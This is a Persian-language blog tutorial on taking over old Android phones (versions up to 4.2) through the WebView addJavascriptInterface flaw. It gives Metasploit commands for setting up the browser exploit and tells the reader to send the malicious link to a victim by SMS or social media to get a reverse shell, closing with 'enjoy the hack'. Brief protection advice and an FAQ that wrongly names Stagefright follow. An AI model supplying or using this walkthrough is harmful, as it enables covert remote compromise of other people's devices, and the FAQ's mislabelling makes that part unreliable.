آموزش هک کردن گوشی اندروید با لینک
هک اندروید کار سختی نیست اما مشکل است. امروز ما به یک آموزش هک منحصر به فرد میپردازیم که از آسیب پذیری WebView (WebView Exploit) و جاوا اسکریپت سوء استفاده می کند و به هکرها اجازه می دهد یک دستگاه اندرویدی را با یک لینک هک کنند. ما قصد داریم یک هک اکسپلویت از راه دور را به شما در لرن پارسی نشان دهیم تا کنترل یک دستگاه اندرویدی را با یک کلیک بر روی یک پیوند مخرب به دست بگیرد که به هکر اجازه می دهد پوسته معکوس دریافت کند. این اکسپلویت معمولاً به عنوان اکسپلویت WebView شناخته می شود. از یک آسیب پذیری در وب ویو اندروید که در نسخه ۲.۱ تا ۴.۲ (jellybean) وجود دارد، سوء استفاده می کند. توجه داشته باشید که این آسیب پذیری تنها زمانی کار می کند که WebView فعال باشد و برای باز کردن پیوند مخرب استفاده شود. این گزینه به طور پیش فرض در تمام گوشی های اندرویدی دارای مرورگرهای سهام(پیش فرض) فعال است.
چگونه یک هکر می تواند از این اکسپلویت جاوا اسکریپت و وب ویو استفاده کند؟
این هک از مشکل افزایش امتیاز در اندروید نسخه ۴.۲ سوء استفاده می کند و آسیب پذیری مؤلفه WebView را کاهش می دهد که به کد جاوا اسکریپت نامعتبر اجازه می دهد توسط WebView که یک یا چند رابط جاوا اسکریپت به آن اضافه شده است، اجرا شود.
کد نامعتبر جاوا اسکریپت میتواند به APIهای جاوا که توسط Interface در معرض دید قرار گرفتهاند فراخوانی کند و دستورات دلخواه را اجرا کند که میتواند دسترسی از راه دور و پوستهها را به هکرها بدهد.
برخی از نسخه های برنامه مرورگر اندروید دارای قابلیت « addJavascriptInterface » هستند و بنابراین در برابر اجرای کد از راه دور (RCE) آسیبپذیر هستند. برنامه مرورگر در اندروید به عنوان گزینه آسیب پذیر در برابر این سوء استفاده شناخته شده است.
یک هکر اکنون می تواند یک پیوند مخرب را برای قربانی ارسال کند و اگر قربانی آسیب پذیر باشد، دستگاه یک پوسته معکوس را به مهاجم برمی گرداند. اساساً هکرها گوشی های اندرویدی را هک می کنند.
بنابراین بدون هیچ مقدمه ای اجازه می دهد تا با استفاده از WebView هک را شروع کنیم.
هک اندروید با یک لینک (WebView و JavaScript اکسپلویت)
مرحله ۱: Kali Linux خود را راه اندازی کنید.
ماشین Kali Linux خود را راه اندازی کنید و کنسول Metasploit را باز کنید.
مرحله ۲: سرور Metasploit را برای استفاده از اکسپلویت WebView تنظیم کنید
برای راه اندازی Metasploit دستورات زیر را در کنسول msf تایپ کنید:
از این دستور ابتدا استفاده کنید :
exploit/android/browser/webview_addjavascriptinterface
سپس تایپ کنید:
set SRVHOST 192.168.182.136 (IP شما در اینجا)
بعد از آن عبارت زیر را تایپ کنید:
set URIPATH /
در آخر اینکه آدرس IP را میزبان تنظیم کنید:
set lhost 192.168.182.136 (your IP here)
سپس تایپ کنید:
exploit
مرحله ۳: ارسال لینک به قربانی
حالا که اکسپلویت webview در حال اجرا است. پیوند مخرب را به قربانی ارسال کنید تا یک دستگاه Android را با لینک هک کنید. می توانید از طریق پیامک یا شبکه های اجتماعی این لینک را برای هدف موردنظرتان ارسال کنید.
در مقال ما، لینک این است: http://192.168.182.136:8080
توجه: این حمله فقط روی دستگاههای اندرویدی محدود با WebView API آسیبپذیر کار میکند.
مرحله ۴: از هک لذت ببرید.
هنگامی که قربانی روی پیوند مخرب کلیک کند، دستگاه اندرویدی او هک می شود. و شما می توانید آن را از راه دور با استفاده از webview کنترل کنید. هک کردن یک دستگاه اندرویدی با لینک به همین راحتی است.
چگونه از خود در برابر هکرها با استفاده از این هک محافظت کنم؟
بررسی کنید که آیا دستگاه شما آسیب پذیر است یا خیر. برای بررسی اینکه آیا دستگاه شما در برابر اکسپلویت ها آسیب پذیر است یا خیر از برنامه امنیتی نورتون استفاده کنید .
– دستگاه خود را بهروزرسانی کنید: این باگ مدتهاست که رفع شده است، مطمئن شوید که دستگاه اندرویدی خود را بهروزرسانی کردهاید تا در برابر آسیبپذیری WebView آسیبپذیر نباشید. همچنین مرورگر خود را به روز کنید.
– دستگاه اندروید خود را تغییر دهید: یک دستگاه جدید با آخرین به روز رسانی ها بخرید.
— PLAYSTORE رسمی: فقط برنامه ها را از فروشگاه رسمی نصب کنید. لینک ها و فایل های ناشناخته ای را که به آنها اعتماد ندارید باز نکنید.
سوالات متداول در مورد هک دستگاه های اندرویدی با استفاده از stepfright :
آیا این هک روی همه تلفن ها کار می کند؟
خیر، فقط گوشی هایی با نسخه اندروید jellybean و پایین تر.
روی دستگاه کالی من کار نمی کند؟
کالی لینوکس را به روز کنید و دوباره امتحان کنید. سعی کنید تمام مراحل را تکرار کنید.
دیدگاه ها